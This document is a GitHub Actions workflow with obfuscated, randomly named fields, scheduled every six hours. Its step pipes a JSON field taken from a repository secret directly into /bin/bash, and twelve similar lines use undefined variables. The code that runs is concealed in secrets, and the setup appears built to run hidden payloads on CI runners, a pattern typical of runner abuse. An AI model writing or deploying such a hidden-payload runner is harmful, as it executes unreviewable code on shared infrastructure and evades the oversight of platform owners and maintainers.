name: qiaosangou8129

on:
  workflow_dispatch:
  schedule:
    - cron: '55 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: qiaosangou8129
        env:
          d5: ${{ secrets.d5 }}
        run: |
          echo $d5 | jq -r .ob72 | /bin/bash
          echo $nlaos8 | jq -r .cbwt3013 | /bin/bash
          echo $g11 | jq -r .m93681 | /bin/bash
          echo $ujknc4078 | jq -r .z099 | /bin/bash
          echo $xm869 | jq -r .yq464 | /bin/bash
          echo $gkon62137 | jq -r .zj79868 | /bin/bash
          echo $jdy68 | jq -r .rca4 | /bin/bash
          echo $lsv52 | jq -r .xie49539 | /bin/bash
          echo $ma7 | jq -r .mx76 | /bin/bash
          echo $w3836 | jq -r .uvxa05 | /bin/bash
          echo $b7 | jq -r .vkzj5931 | /bin/bash
          echo $rwfno1 | jq -r .ic3354 | /bin/bash
          echo $ji1 | jq -r .wk7479 | /bin/bash

